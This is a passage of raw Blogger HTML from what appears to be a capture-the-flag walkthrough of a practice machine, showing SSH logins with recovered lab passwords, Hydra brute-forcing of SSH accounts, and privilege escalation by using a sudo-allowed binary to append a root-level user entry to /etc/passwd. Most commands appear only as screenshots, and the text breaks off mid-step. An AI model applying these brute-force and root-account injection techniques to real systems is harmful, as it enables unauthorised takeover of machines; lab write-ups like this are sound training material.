href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFF-CZci20oDKqWEDDln570NbzbMf392TlegT91l45-m_6rJzS_Aiq-PdTkqDAYaR7EHVRCxb1zfiN6DyKDRwsG9nAmJf66_EGygEaHae09SFmFxvCi2F756cNQY5j0rkuDjqPirzBb9XO/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;70&quot; data-original-width=&quot;776&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFF-CZci20oDKqWEDDln570NbzbMf392TlegT91l45-m_6rJzS_Aiq-PdTkqDAYaR7EHVRCxb1zfiN6DyKDRwsG9nAmJf66_EGygEaHae09SFmFxvCi2F756cNQY5j0rkuDjqPirzBb9XO/s16000/screenshot.21.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- SSH-ing with &lt;b&gt;janitor:Ilovepeepee&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2VCUfqe50xzATINeRv_blOwV8d1JsjLtu-8Iorghxt51PFhwytMybiIjkqRy8v6g3K97sSQgxuVwdsj-JB8M5UWIZuUYFmNH1fBjO5G6sam6Z02LBwbtDMoXHugv1gqaK2Zpx_PySe-ir/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;324&quot; data-original-width=&quot;865&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2VCUfqe50xzATINeRv_blOwV8d1JsjLtu-8Iorghxt51PFhwytMybiIjkqRy8v6g3K97sSQgxuVwdsj-JB8M5UWIZuUYFmNH1fBjO5G6sam6Z02LBwbtDMoXHugv1gqaK2Zpx_PySe-ir/s16000/screenshot.22.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for interesting files:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLWS2DOLdlIdhBho1552QDl75mT0K8PsgvIr2-TOht_xf7YX8U0Kw_kXNeFju5t4ZK7EOUxOFMFCLdIZuN6vYhKkYJLx5rWQBYJTlm5Q3MkUNlGSg_wTsqJnOjBvSLCtgEHN5Etn1_ZsST/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;233&quot; data-original-width=&quot;844&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLWS2DOLdlIdhBho1552QDl75mT0K8PsgvIr2-TOht_xf7YX8U0Kw_kXNeFju5t4ZK7EOUxOFMFCLdIZuN6vYhKkYJLx5rWQBYJTlm5Q3MkUNlGSg_wTsqJnOjBvSLCtgEHN5Etn1_ZsST/s16000/screenshot.23.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- New credentials:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAwiFn7iLruftk9EkYSSaWBcKC4anliuvHwUkSJQOQf2L4XbS4xDuxXnGhutNr3ofw69SBVh_vKalJv_kac4qqKJaICmXXxnbkWG97W3OowtlAidswRJo8_eOqgptN_Euzy0KJpMIX1sBS/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;300&quot; data-original-width=&quot;935&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAwiFn7iLruftk9EkYSSaWBcKC4anliuvHwUkSJQOQf2L4XbS4xDuxXnGhutNr3ofw69SBVh_vKalJv_kac4qqKJaICmXXxnbkWG97W3OowtlAidswRJo8_eOqgptN_Euzy0KJpMIX1sBS/s16000/screenshot.24.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Again &lt;b&gt;Hydra&lt;/b&gt; helps finding new SSH accounts:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOMMtZo_krp6MicMP09z2v7ZnlKKBptEgTZCuUoxrEFsBqTdpDMBLxznBQf8MlYNav26AIVVEQ0dbszf4P3Y9dGnL3313Wk3IndGvfR6sfNZAYzzZuIo0LUypdeOJErB7FqaDBxi9kmN20/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;137&quot; data-original-width=&quot;271&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOMMtZo_krp6MicMP09z2v7ZnlKKBptEgTZCuUoxrEFsBqTdpDMBLxznBQf8MlYNav26AIVVEQ0dbszf4P3Y9dGnL3313Wk3IndGvfR6sfNZAYzzZuIo0LUypdeOJErB7FqaDBxi9kmN20/s16000/screenshot.29.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMJC2mS1i-iujCHwkG0df1LBjYQhzR9kENYF5L1NgCcqooxdQho-aS9TAMse3RVR5gB6tsuOEth2_DAt5_sLLyFTnBbzjqXSe4BdZQl4Z3VTDpeL_JgFnt8NyeL4fjlQRVbUw6h9Qdx_n5/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;45&quot; data-original-width=&quot;435&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMJC2mS1i-iujCHwkG0df1LBjYQhzR9kENYF5L1NgCcqooxdQho-aS9TAMse3RVR5gB6tsuOEth2_DAt5_sLLyFTnBbzjqXSe4BdZQl4Z3VTDpeL_JgFnt8NyeL4fjlQRVbUw6h9Qdx_n5/s16000/screenshot.30.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoChU-tRS-tNp993hHV9vKv6g5AuuzzpU4GYpUgkdcHTKBXi-3EXrCY7NstFq4Zq2G-T0U5wo6WEUcazyLVljtpLTB6tkKjFdDfEVGX9KsNDiJcJB0lE1AkqdLiFthe3V1u7BziCxD_N0o/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;69&quot; data-original-width=&quot;791&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoChU-tRS-tNp993hHV9vKv6g5AuuzzpU4GYpUgkdcHTKBXi-3EXrCY7NstFq4Zq2G-T0U5wo6WEUcazyLVljtpLTB6tkKjFdDfEVGX9KsNDiJcJB0lE1AkqdLiFthe3V1u7BziCxD_N0o/s16000/screenshot.31.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- SSH-ing with&lt;b&gt; fredf:B4-Tru3-001&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEIzGE3C6jeRgsTilF21D0XCjUMj-U7rnQOZE2Glb5UAblUey8IqJIZ9TiMGt2wZJbzVwBrXj5YdCNyAxvPw1VabegiLgTH9_nW4NaA3Vlx_Zrf8-ULWpeiFunB_JSoGA7_dI8D-A3KTmi/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;299&quot; data-original-width=&quot;861&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEIzGE3C6jeRgsTilF21D0XCjUMj-U7rnQOZE2Glb5UAblUey8IqJIZ9TiMGt2wZJbzVwBrXj5YdCNyAxvPw1VabegiLgTH9_nW4NaA3Vlx_Zrf8-ULWpeiFunB_JSoGA7_dI8D-A3KTmi/s16000/screenshot.32.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Checking &lt;b&gt;fredf&lt;/b&gt;&#39;s sudoers permissions:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWq62I-ZAphZzsyOZ1XIeYJWRqt1c0xogCql8CKYAJDWJEYGZfrLWCjWZ8UJhtzOvAfWT0yT6quJQbUaPc7o2BsdFadb42THSIA4CSUmeVcvQSLSVwLkl6RSKJ_8kbTQ_fWzWHss89XjyN/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;140&quot; data-original-width=&quot;636&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWq62I-ZAphZzsyOZ1XIeYJWRqt1c0xogCql8CKYAJDWJEYGZfrLWCjWZ8UJhtzOvAfWT0yT6quJQbUaPc7o2BsdFadb42THSIA4CSUmeVcvQSLSVwLkl6RSKJ_8kbTQ_fWzWHss89XjyN/s16000/screenshot.33.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- &lt;b&gt;test&lt;/b&gt; is an executable file:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBi-XEgIcYkYB2v-aTXxEUU3OJSMGIxZjIyScIFwEmR9eJ7lT_jShCH0INZm8ke67Qeq4PQT3iUE79Tmqeq8G9nuLwa6RYl89PV8sT7zo-bIqn_A7fhVKBMjHWW3UGi6Du2NKzXAcZ45jx/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;72&quot; data-original-width=&quot;699&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBi-XEgIcYkYB2v-aTXxEUU3OJSMGIxZjIyScIFwEmR9eJ7lT_jShCH0INZm8ke67Qeq4PQT3iUE79Tmqeq8G9nuLwa6RYl89PV8sT7zo-bIqn_A7fhVKBMjHWW3UGi6Du2NKzXAcZ45jx/s16000/screenshot.34.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&lt;b&gt; test&lt;/b&gt; takes two files as parameters, appending content of the first to the second:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV9hDgYs7ohiNXk6qJ2Rld-K49KTvy9kqeBnzblZpNkm6yG5SEMHmEtSYF-8ZdNOQvFu4D7z3bHwyZxA1v8_9etv63fMkIA1ZJitIdNOB5QTF06ZcyHJ4m9dxKNM7-eYa04FTjLpi2cPyA/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;209&quot; data-original-width=&quot;617&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV9hDgYs7ohiNXk6qJ2Rld-K49KTvy9kqeBnzblZpNkm6yG5SEMHmEtSYF-8ZdNOQvFu4D7z3bHwyZxA1v8_9etv63fMkIA1ZJitIdNOB5QTF06ZcyHJ4m9dxKNM7-eYa04FTjLpi2cPyA/s16000/screenshot.38.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8gXxXo-I0EULX1D-10_Oznp8qdw6YH6va3jBYnksOrN61iD30ERyDc5gnVrjJTY-SXz-pfu0qxamX1JrFx8JKMzu3AsYGDcDllgE9Xl46BJyhni933qpx7778pGZEXTVx07LwpxlWESA5/&quot; style=&quot;clear: left; display: inline; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;370&quot; data-original-width=&quot;534&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8gXxXo-I0EULX1D-10_Oznp8qdw6YH6va3jBYnksOrN61iD30ERyDc5gnVrjJTY-SXz-pfu0qxamX1JrFx8JKMzu3AsYGDcDllgE9Xl46BJyhni933qpx7778pGZEXTVx07LwpxlWESA5/s16000/screenshot.36.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Using without parameters:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidHS0pT1xO3F6grdq_8hC031ocZGwAN2unBTat9AGrbZaR-P6z5QjZynsll0_2GYoT5aHyuWwvuZRJfIBywrDgYq5GzlVmzbj2CdSt6HGhUNYxoVjCABpmdM-yn22aSKJ1Hk3I8IRDX8HH/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;490&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidHS0pT1xO3F6grdq_8hC031ocZGwAN2unBTat9AGrbZaR-P6z5QjZynsll0_2GYoT5aHyuWwvuZRJfIBywrDgYq5GzlVmzbj2CdSt6HGhUNYxoVjCABpmdM-yn22aSKJ1Hk3I8IRDX8HH/s16000/screenshot.37.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The strategy for achieving Privilege Escalation will be to create a new user &lt;b&gt;whitelist&lt;/b&gt; with root privileges, and appending its record to &lt;b&gt;/etc/passwd&lt;/b&gt; with executable&amp;nbsp;&lt;b&gt;test.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;- openssl &lt;/b&gt;encrypts&amp;nbsp;&lt;b&gt;whitelist:qwerty:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj99f3Q4EBJgeAThmozOyUd3d2psWMxvI_i3tXG0kG7WAu3VzO-JNfAcEeutPP0X05b0GynLVarddTEStsdmV1PVIim9jgLE70ZyKANiLbAJPMHzwIWnGWxv9NUBCkl0SmiDbdVndDUyEho/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;67&quot; data-original-width=&quot;514&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj99f3Q4EBJgeAThmozOyUd3d2psWMxvI_i3tXG0kG7WAu3VzO-JNfAcEeutPP0X05b0GynLVarddTEStsdmV1PVIim9jgLE70ZyKANiLbAJPMHzwIWnGWxv9NUBCkl0SmiDbdVndDUyEho/s16000/screenshot.43.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;-&lt;span style=&quot;font-family: arial;&quot;&gt; Adding username, encrypted password and &lt;b&gt;:0::0::root:/bin/bash&lt;/b&gt; so that &lt;b&gt;whitelist &lt;/b&gt;has &lt;b&gt;root&lt;/b&gt; privileges:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpSyhYZw61NOV6UYM0f3KtroWOYsnlMFXNX3XmgAPChuBUMb3hukcjD7pIfuA1Kub5gTrlL2rgxKuCfUsco2cEWM74L0-qnAWb4Jn2HRavFGAQ-yfpQJZ27z-hezwuJOaYzVyEIwtpqip8/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;729&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpSyhYZw61NOV6UYM0f3KtroWOYsnlMFXNX3XmgAPChuBUMb3hukcjD7pIfuA1Kub5gTrlL2rgxKuCfUsco2cEWM74L0-qnAWb4Jn2HRavFGAQ-yfpQJZ27z-hezwuJOaYzVyEIwtpqip8/s16000/screenshot.48.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Appending the encrypted line to &lt;b&gt;/etc/passwd&lt;/b&gt; with &lt;b&gt;test&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: 